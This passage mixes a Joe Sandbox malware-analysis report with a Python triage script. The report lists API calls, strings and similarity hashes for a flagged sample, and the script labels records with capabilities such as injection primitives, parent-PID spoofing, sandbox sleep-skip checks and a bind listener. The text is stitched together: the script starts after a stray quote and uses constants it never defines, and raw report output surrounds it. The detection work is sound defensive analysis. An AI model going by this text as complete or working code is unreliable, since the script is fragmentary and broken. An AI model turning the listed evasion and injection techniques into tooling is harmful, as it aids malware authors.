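• HeapAlloc.KERNEL32 ref: 00CF7724
• API ID: AttributeHeapInitializeListProcThread$AllocProcess
• String ID:
• Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
• Instruction Fuzzy Hash: 98F09636724B4492DB95DF75B4507BA63A0EB88B90F58542BBB0B42714DE3DC4A58A10
• accept.WS2_32 ref: 00CFEF71
• send.WS2_32 ref: 00CFEFAF
• closesocket.WS2_32 ref: 00CFEFD4
• API ID: free$closesocketsend$accept
• String ID:
• Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
• Instruction Fuzzy Hash: 4401A23530494481EBA49B77F9A5B3D2322EB8DFF4F049212DF2607B95CE39C0918B41
"""

@dataclass
class Record:
    opcode_id: str = ""
    api_id: str = ""
    strings: list = field(default_factory=list)
    apis: set = field(default_factory=set)  # explicit API names, subcalls included

def parse_records(text):
    """One Record per function; 'Instruction Fuzzy Hash' is the last field of each."""
    records, rec = [], Record()
    for line in text.splitlines():
        if m := API_LINE.search(line):
            rec.apis.add(m.group(1))
        elif m := FIELD_LINE.search(line):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "API ID":
                rec.api_id = value
            elif key == "String ID":
                rec.strings = [s for s in value.split("$") if s]  # Joe joins strings with '$'
            elif key == "Opcode ID":
                rec.opcode_id = value
            elif key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec = Record()
    return records

def classify(rec):
    """Capabilities implied by one record (heuristic mapping chosen for this example)."""
    found = []
    # 'API ID' is Joe's alphabetised concatenation of API-name fragments, so
    # GetModuleHandle + GetProcAddress shows up as 'AddressHandleModuleProc'.
    if "GetProcAddress" in rec.apis or "AddressHandleModuleProc" in rec.api_id:
        prims = sorted(s for s in rec.strings if s in INJECTION_PRIMITIVES)
        if prims:
            found.append("runtime resolution of injection primitive: " + ", ".join(prims))
        else:
            found.append("dynamic API resolution: " + ", ".join(rec.strings))
    if "InitializeProcThreadAttributeList" in rec.apis:
        found.append("PROC_THREAD_ATTRIBUTE list for child process (parent-PID spoofing candidate)")
    if {"CreatePipe", "GetStartupInfoA"} <= rec.apis:
        found.append("child process with redirected stdio (command output capture)")
    if {"Sleep", "GetTickCount"} <= rec.apis:
        found.append("Sleep timed with GetTickCount (sleep-skip / sandbox check)")
    if {"accept", "send"} <= rec.apis:
        found.append("listening socket that answers inbound connections (bind listener)")
    return found

def triage(text):
    """Map Opcode ID -> capabilities for every record that triggers a rule."""
    return {r.opcode_id: caps for r in parse_records(text) if (caps := classify(r))}
```

Feed it the plain text of a report (`triage(open("report.txt", encoding="utf-8").read())`) and key the result on Opcode ID so hits can be cross-referenced with the records above. Matching on the explicit `Name.MODULE ref:` lines is preferred; the `API ID` substring is only a fallback for records whose APIs panel is collapsed, because Joe's fragment concatenation can interleave other words between the fragments you are looking for.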
                        APIs
                        • closesocket.WS2_32 ref: 00CFF0A4
                        • free.LIBCMT ref: 00CFF0AE
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • free.LIBCMT ref: 00CFF0B7
                        • free.LIBCMT ref: 00CFF0C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                        • String ID:
                        • API String ID: 1525665891-0
                        • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                        • Instruction ID: 121c111691edc08f94f5a19dd5cd0486e7a6c3177d53720c99d2b1d1f61dda2a
                        • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                        • Instruction Fuzzy Hash: 20D067A665044881DF54EBB2D8E62381320EB98F94F1400369F9E4B26ACD64C896D345
                        Strings
                        • Unknown pseudo relocation bit size %d., xrefs: 00402294
                        • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                         • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                        • API String ID: 0-395989641
                        • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                        • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                        • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                        • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                        APIs
                        Strings
                        • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                        • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                         • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                        • API String ID: 1804819252-157664173
                        • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                        • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                        • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                        • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                         • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: __set_app_type
                        • String ID: 06E$P0E
                        • API String ID: 1108511539-3978550416
                        APIs
                        • _errno.LIBCMT ref: 00CFF8B1
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00CFF8BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID: B
                        • API String ID: 1812809483-1255198513
                        APIs
                        • _errno.LIBCMT ref: 00A4ECB1
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A4ECBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID: B
                        • API String ID: 1812809483-1255198513
                        APIs
                        Strings
                        • Unknown error, xrefs: 00401D2C
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-3474627141
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Argument domain error (DOMAIN), xrefs: 00401CE0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2713391170
                        APIs
                        Strings
                        • Partial loss of significance (PLOSS), xrefs: 00401CF0
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4283191376
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Overflow range error (OVERFLOW), xrefs: 00401D00
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4064033741
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2187435201
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Total loss of significance (TLOSS), xrefs: 00401D20
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4273532761
                        APIs
                        Strings
                        • Argument singularity (SIGN), xrefs: 00401C78
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2468659920
                        APIs
                        • calloc.LIBCMT ref: 00CE1D6A
                          • Part of subcall function 00D0EE08: _calloc_impl.LIBCMT ref: 00D0EE18
                          • Part of subcall function 00D0EE08: _errno.LIBCMT ref: 00D0EE2B
                          • Part of subcall function 00D0EE08: _errno.LIBCMT ref: 00D0EE35
                        • free.LIBCMT ref: 00CE1EF3
                        • free.LIBCMT ref: 00CE1EFD
                        • free.LIBCMT ref: 00CE1F0F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_calloc_implcalloc
                        • String ID:
                        • API String ID: 4000150058-0
                        APIs
                        • calloc.LIBCMT ref: 00A3116A
                          • Part of subcall function 00A5E208: _calloc_impl.LIBCMT ref: 00A5E218
                          • Part of subcall function 00A5E208: _errno.LIBCMT ref: 00A5E22B
                          • Part of subcall function 00A5E208: _errno.LIBCMT ref: 00A5E235
                        • free.LIBCMT ref: 00A312F3
                        • free.LIBCMT ref: 00A312FD
                        • free.LIBCMT ref: 00A3130F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_calloc_implcalloc
                        • String ID:
                        • API String ID: 4000150058-0
                        APIs
                        • malloc.LIBCMT ref: 00CFAD78
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • free.LIBCMT ref: 00CFAEBF
                        • free.LIBCMT ref: 00CFAF23
                        • free.LIBCMT ref: 00CFAF2F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$AllocHeap_callnewhmalloc
                        • String ID:
                        • API String ID: 3531731211-0
                        APIs
                        • malloc.LIBCMT ref: 00A4A178
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • free.LIBCMT ref: 00A4A2BF
                        • free.LIBCMT ref: 00A4A323
                        • free.LIBCMT ref: 00A4A32F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$CurrentProcessfreemalloc
                        • String ID:
                        • API String ID: 1397824077-0